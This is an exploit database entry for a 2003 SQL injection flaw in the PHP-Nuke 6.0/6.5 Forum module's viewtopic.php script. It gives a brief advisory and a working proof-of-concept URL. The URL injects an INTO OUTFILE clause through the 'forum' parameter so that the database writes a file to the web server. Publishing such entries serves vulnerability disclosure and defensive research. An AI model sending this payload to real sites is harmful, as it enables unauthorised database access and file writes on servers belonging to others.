PHP-Nuke 6.0/6.5 Forum Module - 'viewtopic.php' SQL Injection

EDB-ID:

22423

CVE:

N/A


Author:

frog

Type:

webapps


Platform:

PHP

Date:

2003-03-25


source: https://www.securityfocus.com/bid/7193/info

It has been reported that an input validation error exists in the 'viewtopic.php' script included with PHPNuke as part of the Forum module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to inject SQL commands and queries into the SQL database used by PHPNuke.

http://www.example.com/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt